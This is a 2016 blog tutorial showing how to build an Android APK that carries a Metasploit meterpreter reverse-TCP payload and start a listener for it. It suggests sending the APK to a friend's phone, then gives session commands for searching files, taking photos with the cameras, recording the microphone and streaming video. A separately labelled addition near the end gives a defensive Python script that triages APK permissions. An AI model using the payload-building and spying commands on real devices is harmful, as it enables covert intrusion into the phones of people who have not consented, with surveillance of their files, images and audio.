Tuesday, 16 February 2016

How to access a Remote Shell on an Android using Metasploit





You will need ...

  • Linux-based system
  • A brain :)
  • Knowledge of Linux, or maybe not...

To begin the process, we need to create an APK that incorporates a remote shell. To do this, we will use the msfpayload command from Metasploit.

In Kali Linux (what I will be using), open a terminal prompt and type:

sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk



The msfpayload command takes one of the meterpreter payloads and lets you create a standalone file or application from it. You will need to put your Kali Linux IP address in for the LHOST address highlighted in bold. You may also change the port if you please.

Once this is executed, a file called “app.apk” will be created on the desktop:


Now just send this file to your Android device, or the device you want to hack, maybe your friend's phone ;). I used a Samsung Android phone in this case.

Next, we need to set Metasploit up to listen for incoming connections.

In Kali, start Metasploit from the menu or by executing “msfconsole” in a terminal window.


Once Metasploit fires up, type the following commands to create a listener:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.16 (enter your Kali IP address)
set LPORT 4444 (your choice between ports 2834 and 4500)
And to start the handler, type exploit


When you or the victim runs the app on the Android device, it will show up as a large “M” icon with “Main Activity” or something of that sort.

A large button labelled “ReverseTcp” will appear on the phone. When it is pressed, the phone connects out to the Metasploit system and a remote shell session is created.

In your Metasploit Framework console you should see this:

As shown, an active session has been created, and it drops you automatically into a meterpreter prompt / command interface.

From there you can type sysinfo to display device information, or "ps" to display the running processes.



Typing “help” at a meterpreter prompt will list all the commands that are available.

Amazing stuff you can do with your running meterpreter session

Search for a file

meterpreter > search -f *.mp4



Take photos using the device's cameras


First list all the webcams that are available:

meterpreter > webcam_list

You can now run the webcam_snap command; by default it takes a photo using the first camera:

meterpreter > webcam_snap


If you want to take a photo using the second camera:

meterpreter > webcam_snap -i 2


Record sound with the microphone

Run the record_mic command:

meterpreter > record_mic 5

Audio saved to: /root/JxltdUyn.wav

Run the following command to stream from the second camera:

meterpreter > webcam_stream -i 2
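
Seen from the defending side, each capability shown above (outbound connection, camera, microphone, file access) depends on a permission declared in the APK's manifest, so an unknown APK can be triaged before anyone installs it. The following is an added example, not part of the original post: the permission-to-capability mapping, the review rule and the function names are assumptions chosen for illustration, and the sample "APK" is constructed test data.

```python
import io
import re
import zipfile

# Permissions behind the capabilities the post demonstrates (mapping chosen for this example).
WATCHED = {
    "android.permission.INTERNET": "outbound network connection",
    "android.permission.CAMERA": "camera capture",
    "android.permission.RECORD_AUDIO": "microphone recording",
    "android.permission.READ_EXTERNAL_STORAGE": "reading files on shared storage",
}
SENSORS = {"android.permission.CAMERA", "android.permission.RECORD_AUDIO"}

# A compiled manifest stores its strings as UTF-16LE or UTF-8, so match both encodings.
_UTF8 = re.compile(rb"android\.permission\.[A-Z_]+")
_UTF16 = re.compile(re.escape("android.permission.".encode("utf-16-le")) + rb"(?:[A-Z_]\x00)+")


def requested_permissions(apk_bytes):
    """Return the android.permission.* names found in the APK's AndroidManifest.xml."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:
        manifest = apk.read("AndroidManifest.xml")
    found = {m.group().decode("ascii") for m in _UTF8.finditer(manifest)}
    found |= {m.group().decode("utf-16-le") for m in _UTF16.finditer(manifest)}
    return found


def triage(apk_bytes):
    """Map watched permissions to capabilities; flag network access plus camera or microphone."""
    perms = requested_permissions(apk_bytes)
    hits = {p: WATCHED[p] for p in sorted(perms & set(WATCHED))}
    needs_review = "android.permission.INTERNET" in perms and bool(perms & SENSORS)
    return {"capabilities": hits, "needs_review": needs_review}


def constructed_sample_apk(permissions, encoding="utf-16-le"):
    """Build an in-memory ZIP standing in for an APK (constructed data, not a real build)."""
    blob = b"\x03\x00\x08\x00" + b"".join(p.encode(encoding) + b"\x00\x00" for p in permissions)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("AndroidManifest.xml", blob)
    return buf.getvalue()


if __name__ == "__main__":
    sample = constructed_sample_apk(["android.permission.INTERNET", "android.permission.CAMERA"])
    print(triage(sample))
```

Many legitimate apps request the same permissions, so a flagged result is a prompt to check where the APK came from, not a verdict.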


If you run into any issue, or there is anything you don't understand, feel free to comment below ... Thanks



